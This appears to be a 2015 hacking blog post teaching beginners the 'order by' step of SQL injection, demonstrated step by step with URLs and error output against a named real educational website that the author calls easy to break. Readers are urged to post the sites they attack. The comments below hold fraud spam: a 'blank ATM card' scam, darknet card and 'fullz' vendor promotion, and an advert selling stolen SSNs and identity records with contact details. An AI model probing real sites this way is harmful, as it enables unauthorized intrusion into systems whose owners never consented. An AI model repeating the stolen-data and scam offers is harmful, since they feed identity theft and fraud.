WELCOME TO CYBER NINJAS OFFICIAL BLOG! BROWSE GREAT POST ABOUT TECH , GADGETS AND MANY MORE THANKS FOR VISITING!
AD SPACE

Friday, 20 February 2015

MySQL injection finding columns in vuln sites



FINDING COLUMNS IN VULN SITES

Time to learn next step of sql injection
‪#‎recall‬- in previous tutorial we learn to find vuln site yeah? Now we are upgrading the step now finding column of site is our next steP
Vuln site- http://www.skitm.edu.in/faculty.php?id=2' this one is for n00b only this site have very low security i practise in this site when i was learning sql injection so here we go in our step
To find column of the vuln site we have to use this query there are many query to find vuln column but because of the basic tut i am using here only: order by method
Here is the query: order by

Step- http://www.skitm.edu.in/faculty.php?id=2 order by 10
Error: Unknown column '10' in 'order clause'
Try until when this unknow column doesn't disappear from the screen 
Still getting that error yeah so try by putting 9 like this
http://www.skitm.edu.in/faculty.php?id=2 order by 9
Error: Unknown column '9' in 'order clause' still getting error yeah so try and try
http://www.skitm.edu.in/faculty.php?id=2 order by 8
Error: Unknown column '8' in 'order clause' again error  try until it disappear from your screen so keep on decreasing the number
http://www.skitm.edu.in/faculty.php?id=2 order by 7
Error: Unknown column '7' error
http://www.skitm.edu.in/faculty.php?id=2 order by 6
Error: Unknown column 6'
http://www.skitm.edu.in/faculty.php?id=2 order by 5
Error: Unknown column 5'
http://www.skitm.edu.in/faculty.php?id=2 order by 4
Error: Unknown column 4'
http://www.skitm.edu.in/faculty.php?id=2 order by 3
Error: Unknown column 3'
http://www.skitm.edu.in/faculty.php?id=2 order by 2
Error: Unknown column 2'
http://www.skitm.edu.in/faculty.php?id=2 order by 2
No Error in column 2'
It mean this site have 2 column so finally we found column of that site.
It is not mean that in all site there will be 2column in different site different column so don't keep on your mind that only 2 column in all vuln site now here we find column of site. And remember if last error is in 10 of any site then remember there is 9 column same as in next site if got last error in 26 then there is 25 column
Hope you understand this one tutorial
Post your site which you have find site column and fell free to ask your problem you can message me or comment.

3 comments:


  1. I've been seeing posts and testimonials about BLANK ATM CARD but I never believed it, not until I tried it myself. It was on the 12th day of March. I was reading a post about places to visit in Slovakia when I saw this captivating post about how a Man described as Mr John changed his life with the help of a Blank Atm Card. I didn't believe it at first until I decided to reach him through the mail address attached to the post. To my greatest imagination, it was real. Right now am living up to a standard I never used to live before. Today might be your lucky day! Reach Mr Thomas via email:(thomassiguard522@gmail.com) see you on the brighter side of life.you can also contect him via WhatsApp:+17733492820


    ReplyDelete
  2. Darknet legit financial vendors and scam marketplace reviews,
    FULLZ, CC can be bought from Deepweb -
    ordering from darkweb financial websites .

    ReplyDelete
  3. Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.

    **Price for One SSN lead 2$**

    All SSN's are Tested & Verified. Fresh spammed data.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    ->Bulk order negotiable
    ->Hope for the long term business
    ->You can asked for specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete

Adbox